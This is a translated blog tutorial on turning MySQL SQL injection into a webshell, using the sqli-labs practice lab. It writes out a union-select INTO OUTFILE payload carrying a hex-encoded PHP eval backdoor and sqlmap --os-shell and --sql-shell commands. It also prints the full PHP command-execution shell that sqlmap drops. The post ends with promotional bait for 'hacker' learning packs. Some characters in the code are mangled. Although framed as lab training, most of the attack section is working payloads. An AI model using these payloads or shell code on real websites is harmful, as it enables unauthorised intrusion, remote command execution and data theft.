Table of Contents
1. into outfile
Conditions of use
Write to webshell
2. –os-shell
–sql-shell
This article introduces several methods of using sql injection to obtain system permissions. One is to use the outfile function, and the other is to use –os-shell.
一. into outfile
Conditions of use
1. Prerequisites for using this method
- The web directory has write permissions and can use single quotes
- Know the absolute path of the website (the root directory, or any directory below the root directory will work)
- secure_file_priv has no specific value (view in mysql/my.ini)
2. secure_file_priv
secure_file_priv is used to limit the directory in which the load dumpfile, into outfile, and load_file() functions have permission to upload and read files. After mysql version 5.6.34, the value of secure_file_priv defaults to NULL. The following is an introduction to the configuration of secure_file_priv
- The value of secure_file_priv is null, which means that mysqld is restricted and does not allow import|export
- When the value of secure_file_priv is /tmp/, it means that the import|export of mysqld is restricted to only occur in the /tmp/ directory.
- When the value of secure_file_priv has no specific value, it means no restrictions on the import and export of mysqld
So if we want to use the into outfile function to write a sentence, we need to set the value of secure_file_priv to no value. How to set it? The value of secure_file_priv can only be modified by manually opening the configuration file and cannot be modified directly using sql statements.
(1) Look at the value of the secure-file-priv parameter
show global variables like '%secure%';
As shown below, the value of secure_file_priv defaults to NULL, which means that mysqld is restricted and does not allow import|export
(2) Modify the value of secure_file_priv
We can check whether there is a secure_file_priv parameter in mysql/my.ini. If not, we can add secure_file_priv = ’
At this time, check the value of secure_file_priv as follows: it has become empty.
After the settings are completed, we can use this function to write a one-sentence Trojan
Write to webshell
Let’s take the seventh level of sqli-labs as an example
1. Injection point judgment
If you enter correct syntax, it will be displayed normally. If you enter incorrect syntax, it will be displayed as a syntax error. There are only two states on the page, and it is judged to be a blind injection. When we enter ?id=3′)) and sleep(5) — +, there is a successful delay, so the injection point is 3′)). The characters we enter are included in single quotes, and there are two outside the single quotes. wrapped in double quotes
2. Determine the number of columns
We use the order by statement to determine the number of columns. When order by 3, the display is normal. When order by 4, it is abnormal and it is judged to be 3 columns.
3. Write to webshell
In addition, we have obtained the root directory of the website through some methods before, and we can write a sentence ““. In one sentence, it is recommended to perform hexadecimal transcoding (you can do it without encoding), hexadecimal conversion, hexadecimal conversion text string, online hexadecimal conversion | online tool
After encoding, then add 0x in front. As follows, we hexadecimal encode the one-sentence Trojan and write it into the outfile.php file in the root directory.
?id=-3')) union select 1,0x3c3f706870206576616c28245f524551554553545b315d293b3f3e,3 into outfile 'C:\Users\Administrator.WIN2012\Desktop\phpStudy\\ \WWW\outfile.php' -- +
Successfully written. The website directory here must use double slashes, otherwise it will not be written. The first slash means escape. String parsing is not limited to the C compiler, Java compiler, and the parsing of some configuration files. , Web servers, etc., will all encounter the problem of parsing strings. Since traditional Windows uses a single slash path separation form, unnecessary errors may occur when parsing file paths, so There is a form of using double backslashes “\” to separate paths. Regardless of whether the parsing engine parses the backslash into an escape character, what you end up getting in the memory is “”, and there will be no problem with the result.
4. Connect to webshell
Successfully connected
If we set the value of secure_file_priv to null, we will find that it was not written during the above write operation.
So there are two situations where it is not written in:
- The path to the website is incorrect or is not escaped with double slashes
- The value of secure_file_priv is not empty
2. –os-shell
Principle
–os-shell is to use udf to escalate privileges to obtain WebShell. Two files are also written to the server through into oufile. One can directly execute system commands, and the other can upload files.
This is a command of sqlmap, using the prerequisites of this command:
- It is required to be a database DBA. Use –is-dba to check whether the database account connected to the current website is an administrator such as root in the mysql user table. If so, it is dba.
- secure_file_priv has no specific value
- Know the absolute path of the website
Use
Let’s take the first level of sqli-labs as an example
sqlmap -u http://192.168.43.145/2_Shotting_Range/sql/Less-1/?id=1 --os-shell
Here we need to select the script language of the website and the root path of the website
- [1] common location(s) (C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/’) (default) #sqlmap comes with its own test common path
- [2] custom location(s) #Fill in the absolute path yourself
- [3] custom directory list file #Fill in the directory dictionary yourself, we just need to pass the path where the dictionary is located.
- [4]brute force search
sqlmap generated two files in the specified directory (the file names are random, not fixed):
- tmpbeewq.php is used to execute system commands
- tmpuqvgw.php is used to upload files
1. The file content of tmpbeewq.php is
<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set("max_execution_time",0);$z=@ini_get(\ "disable_functions");if(!empty($z)){$z=preg_replace("/[, ] + /",',',$z);$z=explode(', ',$z);$z=array_map("trim",$z);}else{$z=array();}$c=$c." 2> & amp;1\\
";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f("system")){ob_start();system( $c);$w=ob_get_clean();}elseif(f("proc_open")){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array( pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y) ;}elseif(f("shell_exec")){$w=shell_exec($c);}elseif(f("passthru")){ob_start();passthru($c);$w=ob_get_clean ();}elseif(f("popen")){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)) {$w.=fread($x,512);}}@pclose($x);}elseif(f("exec")){$w=array();exec($c,$w) ;$w=join(chr(10),$w).chr(10);}else{$w=0;}echo"<pre>$w
“;?>
visit
2. Use tmpuqvgw.php to upload files
Let’s upload a php one-sentence backdoor
access
So both methods require knowing the absolute path of the website.
Replenish:
As mentioned above, there are three ways to write sqlmap to webshell, one of which is indispensable.
- The web directory has write permissions and can use single quotes
- Know the absolute path of the website
- secure_file_priv has no specific value (view in mysql/my.ini)
During a recent network protection, I used sqlmap to write webshell. I knew the root directory of the website, but I still couldn’t write it in. It is because the value of secure_file_priv is NULL. How do you know what this value is?
–sql-shell
We can use this to execute some sql statements first
sqlmap.py -u "xxx" --sql-shell
- Check the file path (the path of mysql/data, the root directory is generally in the same directory as mysql)
select @@datadir;
- Check whether the value of secure_file_priv is empty
select @@secure_file_priv
The following is null and cannot be written.
When empty, nothing is returned.
As long as you like my article today, my private network security learning materials will be shared with you for free. Come and see what is available.
Network security learning resource sharing:
Finally, I would like to share with you a complete set of network security learning materials that I have studied myself. I hope it will be helpful to friends who want to learn network security!
Getting Started with Zero Basics
For students who have never been exposed to network security, we have prepared a detailed learning and growth roadmap for you. It can be said to be the most scientific and systematic learning route. It will be no problem for everyone to follow this general direction.
[Click to receive] CSDN gift package: “Hacker & Network Security Introduction & Advanced Learning Resource Package” free sharing
1. Learning roadmap
There are a lot of things to learn about attack and defense. I have written down the specific things you need to learn in the road map above. If you can finish them, you will have no problem taking on private work.
2. Video tutorial
Although there are many learning resources on the Internet, they are basically incomplete. This is an Internet security video tutorial I recorded myself. I have accompanying video explanations for every knowledge point in the roadmap above. [Click to get the video tutorial]
I also compiled the technical documents myself, including my experience and technical points in participating in large-scale network security operations, CTF, and digging SRC vulnerabilities. There are also more than 200 e-books [Click to receive technical documents]
(They are all packaged into one piece and cannot be expanded one by one. There are more than 300 episodes in total)
3. Technical documents and e-books
I also compiled the technical documents myself, including my experience and technical points in participating in large-scale network security operations, CTF and digging SRC vulnerabilities. There are also more than 200 e-books [click to receive the book]
4. Toolkit, interview questions and source code
“If you want to do your job well, you must first sharpen your tools.” I have summarized dozens of the most popular hacking tools for everyone. The scope of coverage mainly focuses on information collection, Android hacking tools, automation tools, phishing, etc. Interested students should not miss it.
Finally, here are the interview questions about network security that I have compiled over the past few years. If you are looking for a job in network security, they will definitely help you a lot.
These questions are often encountered when interviewing Sangfor, Qi Anxin, Tencent or other major companies. If you have good questions or good insights, please share them.
Reference analysis: Sangfor official website, Qi’anxin official website, Freebuf, csdn, etc.
Content features: Clear organization and graphical representation to make it easier to understand.
Summary of content: Including intranet, operating system, protocol, penetration testing, security service, vulnerability, injection, XSS, CSRF, SSRF, file upload, file download, file inclusion, XXE, logical vulnerability, tools, SQLmap, NMAP, BP, MSF…
Friends, if you need the complete set of “Hacking & Network Security Introduction & Advanced Learning Resource Package”, click the link below to get it.
CSDN gift package: “Hacker &Network Security Introduction &Advanced Learning Resource Package” free sharing
